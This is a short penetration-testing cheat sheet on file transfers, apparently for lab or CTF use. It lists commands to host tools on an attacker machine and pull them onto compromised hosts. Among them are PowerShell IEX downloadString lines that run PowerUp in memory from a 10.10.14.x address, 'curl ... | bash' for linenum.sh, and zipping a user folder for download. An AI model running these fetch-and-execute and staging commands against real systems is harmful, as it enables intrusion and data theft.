File Transfers

Hosting files

python -m SimpleHTTPServer 80
python -m pyftpdlib -p 21 --write
smbserver.py share `pwd` -smb2support

Transfering via Windows Machine

certutil.exe -urlcache -f http://10.10.14.8/PowerUp.ps1 
curl http://10.10.14.8/PowerUp.ps1 -O PowerUp.ps1
powershell.exe Invoke-WebRequest http://10.10.14.8/PowerUp.ps1 -OutFile PowerUp.ps1

powershell.exe -command iwr -Uri  http://10.10.14.8/PowerUp.ps1 -OutFile C:\Temp\PowerUp.ps1 "

A .ps1 script can be ran in memory instead of being saved to the disk using iex

powershell "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.6/PowerUp.ps1');Invoke-Allchecks"
IEX(New-Object Net.WebClient).downloadString('http://10.10.14.6/Invoke-Portscan.ps1')

Compress folder into zip before downloading

Compress-Archive -Path C:\Users\nikk37\ -DestinationPath 1.zip

Transfering via Linux Machine

wget http://10.10.14.8/linPEAS.sh 
curl http://10.10.14.8/linPEAS.sh -o linPEAS.sh
curl http://10.10.14.6/linenum.sh | bash
PreviousMetasploitNextDNS Tunneling

Last updated